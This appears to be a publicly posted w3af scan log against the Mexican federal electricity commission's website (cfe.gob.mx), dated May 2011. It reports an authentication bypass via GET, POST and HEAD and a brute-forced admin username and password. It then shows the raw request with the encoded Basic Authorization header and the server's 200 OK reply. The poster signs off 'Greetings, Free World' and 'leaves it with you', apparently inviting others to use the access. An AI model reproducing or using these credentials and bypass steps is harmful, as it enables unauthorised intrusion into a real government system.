[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/_vti_inf.html | Method: GET
[Tue 24 May 2011 11:37:30 PM CDT] The resource: "http://www.cfe.gob.mx/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.

htaccessMethods/auth/Misconfigured acces control:

The resource: "http://www.cfe.gob.mx/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.

basicAuthBrute/auth/Guessable credentials:

Found authentication credentials to: "http://www.cfe.gob.mx/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 95.

Raw:

GET http://www.cfe.gob.mx/Paginas/Home.aspx HTTP/1.1
Accept: */*
Host: www.cfe.gob.mx
Accept-encoding: identity
Authorization: Basic YWRtaW46NzNtcDEyMw==
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)


HTTP/1.1 200 OK
content-length: 54092
x-powered-by: ASP.NET
microsoftsharepointteamservices: 12.0.0.6421
expires: Tue, 10 May 2011 04:31:55 GMT
server: Microsoft-IIS/6.0
last-modified: Wed, 25 May 2011 04:31:55 GMT
cache-control: private, max-age=0
date: Wed, 25 May 2011 04:31:56 GMT
content-type: text/html; charset=utf-8
x-aspnet-version: 2.0.50727

There, I'll leave it with you.

Greetings, Free World